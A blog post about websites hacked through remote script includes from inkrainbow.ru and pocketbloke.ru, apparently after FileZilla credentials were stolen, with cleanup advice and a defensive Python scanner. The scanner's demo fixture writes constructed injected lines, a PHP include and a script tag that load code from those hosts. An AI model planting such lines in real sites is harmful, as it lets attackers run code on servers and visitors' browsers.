Inkrainbow/Pocketbloke Hackers

Recently quite a few of the sites I look after have been hacked by people who leave an include in files such as .js and .php files. The include pulls a script from their own servers at inkrainbow.ru and pocketbloke.ru.

I'm not entirely sure what the script does, but it seems that they get into the sites via FTP, which means my PC must have been infected by a trojan that has been sending them my details. I have spoken to another developer and have also seen a comment on another blog post about the same guys, here, which suggests that the trojan targets FileZilla specifically and in that way gets all the saved login details for your sites. If you follow that link to Nate Stiller's blog you will get some good advice on what to look for.

What I have been doing up until now is to download only the image and template folders, delete the entire installation, reinstall the CMS from a clean copy and then re-upload the images and template folders. Then I change all the FTP login details as well as the admin login details on the systems themselves. The order matters: if the PC with the trojan on it is not cleaned first, the new FTP passwords are sent straight back to them as soon as they are saved, so clean the machine before rotating anything.

So far I have had WordPress, Joomla and plain HTML sites hacked. I have also downloaded a nifty little application called UnHackMe, which helps with detecting rootkits and trojans that your normal anti-virus won't pick up.

Hope this helps someone, as I have not seen many posts so far about these guys. If you have anything to add, please comment here or on Nate's blog post.

*Edit 19 August 2010* Nate developed a script that you can upload to your site and it will scan your entire site for this malicious code, find it here.
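If you would rather check a downloaded copy of a site yourself before re-uploading anything, the script below walks a site tree and reports every line in a .php, .js, .html or .htm file that references either of the two hosts named in this post. It is an added example written for this page, not Nate's scanner and not code from the original post; the hit lines it looks for in the demo tree are constructed placeholders, not the real injected payload, which the post does not reproduce.

```python
import os
import sys
import tempfile
from pathlib import Path
import re

# The two hosts this post reports. Add any others you find in your own files.
SUSPECT_HOSTS = ("inkrainbow.ru", "pocketbloke.ru")

# File types in which the post saw the injected include land.
SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}

# Case-insensitive match on any suspect host; the injected include may use
# either http:// or protocol-relative URLs, so match the host only.
_HOST_RE = re.compile("|".join(re.escape(h) for h in SUSPECT_HOSTS), re.IGNORECASE)


def scan_file(path, root):
    """Return (relative_path, line_number, snippet) for each matching line."""
    hits = []
    try:
        data = path.read_bytes()
    except OSError:
        return hits
    # Decode leniently: we want to read injected lines, not fail on odd bytes.
    text = data.decode("utf-8", errors="replace")
    rel = path.relative_to(root).as_posix()
    for lineno, line in enumerate(text.splitlines(), 1):
        if _HOST_RE.search(line):
            hits.append((rel, lineno, line.strip()[:120]))
    return hits


def scan_tree(root):
    """Walk a site tree and scan every file with a suffix in SCAN_SUFFIXES."""
    root = Path(root)
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            if p.suffix.lower() in SCAN_SUFFIXES:
                hits.extend(scan_file(p, root))
    return sorted(hits)


def demo():
    """Build a small constructed site tree in a temp dir and scan it.

    The file contents are made up for this example; they stand in for the
    kind of include the post describes, not the attackers' actual code.
    """
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "templates").mkdir()
        (root / "js").mkdir()
        (root / "index.php").write_text("<?php echo 'clean file'; ?>\n")
        (root / "templates" / "footer.php").write_text(
            "</div>\n<?php include('http://inkrainbow.ru/x.php'); ?>\n"
        )
        (root / "js" / "main.js").write_text(
            "document.write('<script src=\"http://pocketbloke.ru/a.js\"></scr'+'ipt>');\n"
        )
        (root / "logo.png").write_bytes(b"\x89PNG not scanned")
        return scan_tree(root)


if __name__ == "__main__":
    # Usage: python scan_site.py /path/to/downloaded/site
    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = scan_tree(target) if target else demo()
    for rel, lineno, snippet in results:
        print(f"{rel}:{lineno}: {snippet}")
    print(f"{len(results)} suspicious line(s) found")
```

Run it against the downloaded copy of a site (or with no argument to see it work on the constructed demo tree). A hit means that file should be replaced from a clean copy rather than edited by hand, since there may be more than one injected line per file; a clean run is not proof the site is clean, because it only looks for these two hostnames and only in the listed file types.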

In: On the Web


3 Responses to “Inkrainbow/Pocketbloke Hackers”

  1. Thanks for this. I have been affected by this, so it's good to know that it is a problem with FileZilla.

  2. If you have AVG with LinkScanner installed it will block pages with these links on them!

  3. Dooks, Nate developed a script that will scan your site for this malicious code. Find it at the post on his blog.
